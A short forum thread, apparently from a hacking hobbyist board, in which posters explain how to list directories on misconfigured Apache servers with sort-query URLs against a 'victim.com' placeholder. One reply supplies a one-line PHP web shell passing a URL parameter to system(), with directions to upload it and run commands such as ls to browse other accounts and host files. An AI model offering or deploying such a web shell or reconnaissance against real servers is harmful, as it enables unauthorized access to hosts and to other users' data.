:confused:
Is it possible to get the file listing of any directory on an apache-based web server ?
I mean is it possible to get the equivalent of ls using only a browser ?

yes and no only if the server hasnt been configured properly if the short of it is if their isnt a index file its posible but u can turn the option of virtual listings off but it depends on the webmaster hehe and limp1058 aint to good at it lmao sorry had to do it
RiOtEr

http://www.victim.com/?C=N&O=D
Sort Files By Name

http://www.victim.com/?C=M&O=A
Sort Files By Last Modified

http://www.victim.com/?C=S&O=A
Sort Files By Size

http://www.victim.com/?C=D&O=A
Sort Files By Description

As RiOtEr said, this only works if the server has been configured improperly... But you wouldnt believe how many servers have this bug unpatched :)

Ok thx guys. I gonna test it right now

Script Kiddie(ing) is the easiest way perhaps...
If the server allows php to be used, put the below code in a file named asa.php and upload it.
Once uploaded, you may do almost anything on the server, including -but not limitet to- browsing other accounts on the host, and the host's own files;

<?php
system($cmd);
?>

go to the url http://somesite.co/asa.php?cmd=ls
You will see the ls output in the screen...
:hiphop: :smokes:

Well, the servers I tested were patched... :( At least, my web site is protected against this vulnerability... :p